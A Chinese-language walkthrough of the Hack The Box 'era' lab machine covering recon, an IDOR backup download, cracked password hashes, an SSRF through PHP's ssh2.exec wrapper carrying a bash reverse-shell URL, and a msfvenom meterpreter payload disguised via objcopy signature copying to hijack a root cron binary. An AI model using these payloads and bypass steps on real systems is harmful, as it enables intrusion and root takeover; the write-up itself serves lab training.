HTB賽季8靶場

HTB賽季8靶場 - era

在這里插入圖片描述

nmap掃描

└─$ nmap -p- --min-rate 1000 -T4 10.129.137.201 -oA nmapfullscan                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-27 21:19 EDT
Warning: 10.129.137.201 giving up on port because retransmission cap hit (6).
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 30.47% done; ETC: 21:21 (0:01:13 remaining)
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 50.06% done; ETC: 21:21 (0:00:58 remaining)
Nmap scan report for 10.129.137.201
Host is up (0.43s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  httpNmap done: 1 IP address (1 host up) scanned in 157.41 seconds

ffuf掃描vhost

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://era.htb/ -H 'Host: FUZZ.era.htb'

![[Pasted image 20250728101147.png]]

![[Pasted image 20250728101240.png]]

dirsearch掃描頁面

dirsearch -u http://file.era.htb/

![[Pasted image 20250728102347.png]]

注冊賬號并登錄
![[Pasted image 20250728102402.png]]

IDOR竊取備份

http://file.era.htb/download.php?id=54&dl=true
http://file.era.htb/download.php?id=150&dl=true

![[Pasted image 20250728102941.png]]

我們爬取sqlite3DB文件
![[Pasted image 20250728141506.png]]

離線破解密碼

$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustang

我們用備份數據庫里面的內容無法成功登陸，故修改問題答案
![[Pasted image 20250728155554.png]]

SSH2 + SSRF = RCE

登錄admin_ef01cab31aa
![[Pasted image 20250728155620.png]]

我們分析源碼可知fopen處存在漏洞，只要我們是管理員賬戶，我們便可以成功控制fopen函數。
![[Pasted image 20250728161833.png]]

![[Pasted image 20250728161933.png]]

那么我們可以嘗試使用賬號密碼來執行一下命令了。

http://file.era.htb/download.php?id=6785&show=true&format=ssh2.exec://eric:america@127.0.0.1:22/bash+-i+>%26+/dev/tcp/10.10.16.3/9001+0>%261;

![[Pasted image 20250728162004.png]]
![[Pasted image 20250728162017.png]]

objcopy sh文件自檢繞過

上linpeas.sh搜查
![[Pasted image 20250728163723.png]]

上pspy64監控定時任務
![[Pasted image 20250728164135.png]]

我們且對monitor文件可寫，我們生成shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=9001 -f elf -o reverse.elf

傳輸到受害機器，然后我們提取monitor的特征碼（因為直接替換貌似不執行monitor，懷疑存在檢測）

#提取monitor的特征碼
objcopy --dump-section .text_sig=sig monitor#添加monitor的特征碼到惡意文件
objcopy --add-section .text_sig=sig reverse.elf

開啟msf監聽，然后復制bypass后的惡意文件到monitor

cp reverse.elf monitor

最終我們會獲取一個shell
![[Pasted image 20250728174208.png]]

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/web/91028.shtml
繁體地址，請注明出處：http://hk.pswp.cn/web/91028.shtml
英文地址，請注明出處：http://en.pswp.cn/web/91028.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！